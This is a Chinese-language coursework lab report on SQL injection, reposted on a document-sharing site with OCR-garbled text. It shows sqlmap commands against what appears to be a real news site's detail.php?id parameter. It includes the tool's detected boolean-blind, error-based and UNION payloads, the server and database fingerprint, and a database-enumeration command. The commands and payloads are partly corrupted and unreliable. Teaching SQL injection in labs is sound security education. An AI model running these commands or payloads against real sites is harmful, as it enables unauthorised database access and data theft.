- 44
- 0
- 约8.61千字
- 约 7页
- 2021-02-23 发布于天津
- 举报
精品文档
精品文档
PAGE
PAGE #欢迎下载
课程名称 网络信息安全综合实验 实验项目名称 SQL注入攻击
一、 实验要求
在虚拟机环境查找 SQL注入漏洞,通过Metasploit平台的sqlmap攻击实施SQL注入, 了解防御措施
二、 实验环境
攻击机:BT5r3, IP 地址:
URL /004_zhnews/search/detail.php?id=10832
、实验步骤
打开终端,进入 Sqlmap 目录:cd /pentest/database/sqlmap
通过Sqlmap进行注入攻击。
:;/pentest/database/sqlniap# python sqUap.py -u 1 httpr//search讥 cn/004_zhnews/search/detail.php?id=lG8321 一 —
[02:10:A9] [INFO] resuming back-end DBMS ntysql*
[92:10:60] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 日 HTTPfs-) requests;
Place: GET
Parameters id
Type: booledn-b苜弓Ed blind
Titles AMD boolean-based blind - WHERE or HAVING ctause
1 I Payload: ld=10B32 AND 2449=2449
Type: error-ba^ed
Title; MySQL = 5.6 ANO error^based - WHERE or HAVING clause |
Payload; id=10032 AND (SELECT 436C FR0M(SELECT CQUNTt^),CQNCAT(x3aa73763a,(SELEC T (CASE 丽EN (4366=4366) THEN 1 ELSE C END)}r Gx3a6570673aj FL00R(RAND(9)^2))x FROM INFO RMATION SCHEMA.CHARACTERESETS GROUP BY X)a) *
Type: UPilON query .__=;
Title: MySQL UNIOhJ query (NULL) - 11 columns ,
Pay load: xd=10832 LIMIT 1.1 UM10N ALL 5ELECT NULL. WULL, UlhlCAT(6x1a6a73763at6x4a5 759^26a656b€d5148Jta3a657e73a)R NULL, NULL, NULL, hrtJLL, HULL, NULL, NlKLr NULL#
上图可知:sqlmap探测出URL中的id参数存在着SQL注入点,并包含了基于错误的 SQL注入点以及UNION 查询注入点。
[51:20:14] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 4.4.9, Apache 1.3.28
back-end DBMS: MySQL 5.G g
[ei;2e:14] [INFO] fetched data logged to text files under /pentest/database/sq map/Qutput/search? j 百.cei^gov? cn1
[]shutting down at 61:25:14
由上图可知后台数据库的版本是 MySQL 5.0, Web应用平台为PHP 4.4.9/Apache 1.3.28
通过Sqlmap获取数据库名。
root^bt:/pentest/database/sqlmap# python sqlrrap. py -u 1 http://search. j . zhfiews/search/detail.php?id=10832, —dbs 6
sqlmap/1.0- dev - 25eca9d - autofnatic SQL injection and database takeover tool htlpz/X^qlinap. org
18]6 ftching the SQL retrieved retrieved retrieved retrieved retrieved retrieved retrieved
原创力文档

文档评论(0)